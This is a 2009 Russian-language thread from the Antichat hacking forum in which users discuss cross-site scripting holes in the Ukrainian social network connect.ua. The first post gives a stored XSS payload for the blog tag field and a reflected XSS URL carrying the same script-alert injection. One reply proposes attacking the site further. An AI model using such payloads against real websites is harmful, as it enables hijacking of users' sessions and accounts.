connect.ua

Discussion in 'Социальные сети' started by _krad_, 14 Sep 2009.

  1. _krad_

    _krad_ New Member

    Joined:
    30 Nov 2008
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Активная XSS:
    Когда создаем новую запись в блоге, в поле "Мітки" вводим

    "><script>alert(123)</script>

    Аналогичная пассивная XSS:

    http://connect.ua/blogs?index&tag="><script>alert(123)</script>
     
    #1 _krad_, 14 Sep 2009
  2. ligendo

    ligendo Banned

    Joined:
    5 Sep 2009
    Messages:
    3
    Likes Received:
    4
    Reputations:
    3
    да там их туева хуча
     
    #2 ligendo, 14 Sep 2009
  3. ZnikiR

    ZnikiR Member

    Joined:
    14 Jan 2009
    Messages:
    117
    Likes Received:
    21
    Reputations:
    -5
    ну и что вы сделатете с этими дырками???
    вот такую бы на майл.ру или б на вк,тогда да!

    ой извеняюсь,это что ли соц сеть в украине?

    Я в шоке дырявый код ппц простоа говрят у них там очень много пользователей около 800 000 !!!
    Давайте разденем сайт!!!
     
    #3 ZnikiR, 14 Sep 2009
    Last edited: 14 Sep 2009
  4. Enemy_best

    Enemy_best Banned

    Joined:
    24 Jul 2009
    Messages:
    0
    Likes Received:
    1
    Reputations:
    -20
    И чё этот скрипт делает?
     
    #4 Enemy_best, 14 Sep 2009
  5. Kusto

    Kusto Elder - Старейшина

    Joined:
    4 Feb 2007
    Messages:
    886
    Likes Received:
    678
    Reputations:
    510
    не надо было отдельную тему создавать для активок и пассивок есть соответствующие темы, просто в очередной раз с"экономили на кодерах вот и все, а насчет активок зайди в раздел активные XSS там найдеш их кучу на известных сайтах, могу выложить и пассивок на том-же майле- не одну, так мне что отдельную тему создавать?
     
    #5 Kusto, 14 Sep 2009
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.